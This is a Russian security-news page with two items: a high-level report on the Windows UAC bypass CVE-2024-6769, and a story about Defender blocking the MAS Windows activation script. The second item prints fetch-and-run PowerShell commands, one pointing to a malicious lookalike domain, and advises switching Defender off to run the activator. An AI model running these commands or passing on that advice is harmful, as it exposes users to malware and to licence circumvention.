Связка эксплойтов позволяет обойти UAC и получить прав админа в Windows

Связка эксплойтов позволяет обойти UAC и получить прав админа в Windows

Связка эксплойтов позволяет обойти UAC и получить прав админа в Windows

Специалисты предупреждают об уязвимости в Windows, позволяющей обойти контроль учётных записей пользователей (UAC) и повысить права в системе до уровня SYSTEM.

Проблема, которую отслеживают под идентификатором CVE-2024-6769, получила 6,7 балла по шкале CVSS. В настоящее время доступен демонстрационный эксплойт.

«На системном диске есть определённые места, куда злоумышленник сможет записывать или удалять файлы. Например, «C:\Window», что даёт атакующему возможность получить контроль над файлами с правами SYSTEM», — объясняет Тайлер Регули из Fortra.

Microsoft изучила отчёт исследователей, однако отметила, что не считает это уязвимостью, поскольку она по классификации якобы попадает под «приемлемый выход за границы безопасности».

Тем не менее продемонстрированный Fortra вектор позволяет аутентифицированному пользователю обойти защитный механизм UAC, настроенный на средний уровень, и получить права администратора.

Для успешной эксплуатации CVE-2024-6769 у атакующего уже должен быть доступ к целевой системе. Для начала придётся переназначить корневой диск ОС (как, например, «C») на подконтрольную директорию.

Эта операция должна переместить системную папку «system32», которая используется многими службами для загрузки критически важных для работы файлов.

Отсюда можно применить метод подгрузки вредоносной DLL, которую злоумышленник должен поместить в system32. Для этого можно задействовать службу CTF Loader (ctfmon.exe), работающую с правами администратора.

Microsoft, как уже отмечалось выше, проблему пока устранять не планирует.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru